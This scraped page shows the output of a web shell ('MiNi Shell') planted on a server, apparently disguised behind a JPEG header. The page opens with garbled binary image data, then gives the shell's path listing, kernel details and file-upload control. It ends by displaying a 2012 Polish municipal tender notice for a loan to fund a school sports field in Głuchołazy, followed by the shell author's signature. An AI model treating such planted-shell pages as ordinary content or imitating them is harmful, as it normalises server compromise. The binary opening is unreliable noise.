JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120928/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120928/370796-N-2012.html

<p class="kh_header"><b>Głuchołazy: Kredyt długoterminowy na realizację inwestycji pn. Budowa wielofunkcyjnego boiska przy Publicznym Gimnazjum nr 1 w Głuchołazach do wysokości 503.000 zł (słownie: pięćset trzy tysiące złotych).</b><br>
<b>Numer ogłoszenia: 370796 - 2012; data zamieszczenia: 28.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina  Głuchołazy , Rynek 15, 48-340 Głuchołazy, woj. opolskie, tel. 77 4092100, faks 77 4092101.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.glucholazy.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Kredyt długoterminowy na realizację inwestycji pn. Budowa wielofunkcyjnego boiska przy Publicznym Gimnazjum nr 1 w Głuchołazach do wysokości 503.000 zł (słownie: pięćset trzy tysiące złotych)..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Kredyt długoterminowy na realizację inwestycji pn. Budowa wielofunkcyjnego boiska przy Publicznym Gimnazjum nr 1 w Głuchołazach do wysokości 503.000 zł (słownie: pięćset trzy tysiące złotych). 

2.	Data zaciągnięcia kredytu - kredyt będzie uruchomiony w transzach:
- pierwsza transza w kwocie 100.000 zł - do dnia 20 listopada 2012 roku,
- kolejne transze kredytu będą uruchamiane w miarę wpływu do gminy faktur za roboty budowlane, nie później niż do dnia 20 grudnia 2012 roku.
Uruchomienie kredytu następuje na pisemny wniosek gminy w terminie 3 dni roboczych od dnia złożenia wniosku.

3.	Zabezpieczenie kredytu: weksel in blanco wraz z deklaracją wekslową 

4.	Terminy spłaty kredytu: 
-	karencja w spłacie rat kapitałowych do dnia 19 stycznia 2014 roku,
-	kredyt będzie spłacany w 36 miesięcznych ratach, według następującego harmonogramu spłat:

1	do dnia 20 stycznia 2014r.- 8 583 zł 
2	do dnia 20 lutego 2014r.- 8 583 zł 
3	do dnia 20 marca 2014r.	 - 8 583 zł 
4	do dnia 20 kwietnia 2014r. - 8 583 zł 
5	do dnia 20 maja 2014r. - 8 583 zł 
6	do dnia 20 czerwca 2014r. - 8 583 zł 
7	do dnia 20 lipca 2014r. - 8 583 zł 
8	do dnia 20 sierpnia 2014r. - 8 583 zł 
9	do  dnia 20 września 2014r. - 8 583 zł 
10	do dnia 20 października 2014r. - 8 583 zł 
11	do dnia 20 listopada 2014 r. - 8 583 zł 
12	do dnia 20 grudnia 2014r. - 8 587 zł 
13	do dnia 20 stycznia 2015r. - 16 667 zł 
14	do dnia 20 lutego 2015r. - 16 667 zł 
15	do dnia 20 marca 2015r.	- 16 667 zł 
16	do dnia 20 kwietnia 2015r. - 16 667 zł 
17	do dnia 20 maja 2015r. - 16 667 zł 
18	do dnia 20 czerwca 2015r. - 16 667 zł 
19	do dnia 20 lipca 2015r. - 16 667 zł 
20	do dnia 20 sierpnia 2015r. - 16 667 zł 
21	do dnia 20 września 2015r. - 16 667 zł 
22	do dnia 20 października 2015r. - 16 667 zł 
23	do dnia 20 listopada 2015r. - 16 667 zł 
24	do dnia 20 grudnia 2015r. - 16 663 zł 
25	do dnia 20 stycznia 2016r. - 16 667 zł 
26	do dnia 20 lutego 2016r. - 16 667 zł 
27	do dnia 20 marca 2016r.	 - 16 667 zł 
28	do dnia 20 kwietnia 2016r. - 16 667 zł 
29	do dnia 20 maja 2016r. - 16 667 zł 
30	do dnia 20 czerwca 2016r. - 16 667 zł 
31	do dnia 20 lipca 2016r. - 16 667 zł 
32	do dnia 20 sierpnia 2016r. - 16 667 zł 
33	do dnia 20 września 2016r. - 16 667 zł 
34	do dnia 20 października 2016r. - 16 667 zł 
35	do dnia 20 listopada 2016r. - 16 667 zł 
36	do dnia 20 grudnia 2016r. - 16 663 zł 



5.	Odsetki od kredytu - odsetki naliczane w okresach miesięcznych od kwoty zadłużenia, począwszy od pierwszego do ostatniego dnia miesiąca, za które są naliczane, płatne będą do 20 dnia każdego miesiąca następującego po miesiącu, za który nastąpiło naliczenie. Pierwsza rata odsetek płatna do dnia 20 grudnia 2012 roku. Odsetki za ostatni okres odsetkowy płatne będą wraz ze spłatą ostatniej raty kredytu (to jest do dnia 20 grudnia 2016r.). Spłata odsetek według następującego harmonogramu:

1	do dnia 20 grudnia 2012r.
2	do dnia 20 stycznia 2013r.
3	do dnia 20 lutego 2013r.
4	do dnia 20 marca 2013r.
5	do dnia 20 kwietnia 2013r.
6	do dnia 20 maja 2013r.
7	do dnia 20 czerwca 2013r.
8	do dnia 20 lipca 2013r.
9	do dnia 20 sierpnia 2013r.
10	do dnia 20 września 2013r.
11	do dnia 20 października 2013r.
12	do dnia 20 listopada 2013r.
13	do dnia 20 grudnia 2013r.
14	do dnia 20 stycznia 2014r.
15	do dnia 20 lutego 2014r.
16	do dnia 20 marca 2014r.
17	do dnia 20 kwietnia 2014r.
18	do dnia 20 maja 2014r.
19	do dnia 20 czerwca 2014r.
20	do dnia 20 lipca 2014r.
21	do dnia 20 sierpnia 2014r.
22	do  dnia 20 września 2014r.
23	do dnia 20 października 2014r.
24	do dnia 20 listopada 2014r.
25	do dnia 20 grudnia 2014r.
26	do dnia 20 stycznia 2015r.
27	do dnia 20 lutego 2015r.
28	do dnia 20 marca 2015r.
29	do dnia 20 kwietnia 2015r.
30	do dnia 20 maja 2015r.
31	do dnia 20 czerwca 2015r.
32	do dnia 20 lipca 2015r.
33	do dnia 20 sierpnia 2015r.
34	do dnia 20 września 2015r.
35	do dnia 20 października 2015r.
36	do dnia 20 listopada 2015r.
37	do dnia 20 grudnia 2015r.
38	do dnia 20 stycznia 2016r.
39	do dnia 20 lutego 2016r.
40	do dnia 20 marca 2016r.
41	do dnia 20 kwietnia 2016r.
42	do dnia 20 maja 2016r.
43	do dnia 20 czerwca 2016r.
44	do dnia 20 lipca 2016r.
45	do dnia 20 sierpnia 2016r.
46	do dnia 20 września 2016r.
47	do dnia 20 października 2016r.
48	do dnia 20 listopada 2016r.
49	do dnia 20 grudnia 2016r.

6.	Zamawiający nie przewiduje ponoszenia kosztów (prowizji i opłat bankowych) związanych z obsługą kredytu innych niż prowizja od udzielonego kredytu oraz oprocentowania kredytu opartego na zaoferowanej przez Bank stawce. Zamawiający nie przewiduje ponoszenia kosztów związanych z ewentualną zmianą postanowień umowy z Bankiem Kredytującym.

7.	Prowizja Banku od udzielanego kredytu nie może przekroczyć 0,5% kwoty zaciąganego kredytu. 

8.	Prowizja określona w % od kwoty wykorzystanego kredytu, będzie płatna w terminie uruchomienia kredytu.

9.	Bank Kredytujący nalicza prowizję tylko od kwoty wykorzystanego kredytu i nie pobiera prowizji ani innych opłat od kwoty kredytu, który nie został wykorzystany przez Zamawiającego. 

10.	Zamawiający zastrzega sobie prawo wcześniejszej spłaty kredytu bez pobierania przez Bank prowizji i opłat. 

11.	Zamawiający zastrzega sobie prawo do niewykorzystania całej kwoty kredytu. 

12.	Oprocentowanie kredytu będzie zmienne oparte o stawkę WIBOR 1M powiększoną o marżę banku. Marża banku przez cały okres kredytowania jest stała. Stawka WIBOR 1 M na dany okres odsetkowy będzie ustalana na podstawie notowania z miesiąca poprzedzającym okres odsetkowy na dzień ustalony przez Bank składający ofertę (dzień z którego będzie pochodzić notowanie stawki WIBOR 1M określa Bank w ofercie). Bank zobowiązany jest podać oprocentowanie kredytu z wyszczególnieniem stawki WIBOR 1M z dnia 19 września 2012 roku (WIBOR 1M z dnia 19.09.2012r. - 4,89%) oraz stałej marży banku (w %) według następującego wzoru:

WIBOR 1M (4,89 %) + marża banku (.............%) = ..............%.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 66.11.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.12.2016.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)	Formularz Oferty, sporządzony na podstawie wzoru stanowiącego Załącznik Nr 1 do niniejszej SIWZ ,
b)	stosowne Pełnomocnictwo(a) - w przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio ze złożonego w ofercie odpisu z właściwego rejestru,
c)	w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamowienia, dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu   o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://gmina.glucholazy.sisco.info/?przetargi=1&rok=2012&mc=10<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Głuchołazach ul. Rynek 15 48-340 Głuchołazy, Wydział Zamówień Publicznych pok. nr 16.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.10.2012 godzina 10:30, miejsce: Urząd Miejski w Głuchołazach ul. Rynek 15 48-340 Głuchołazy, sekretariat pok. nr 11.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com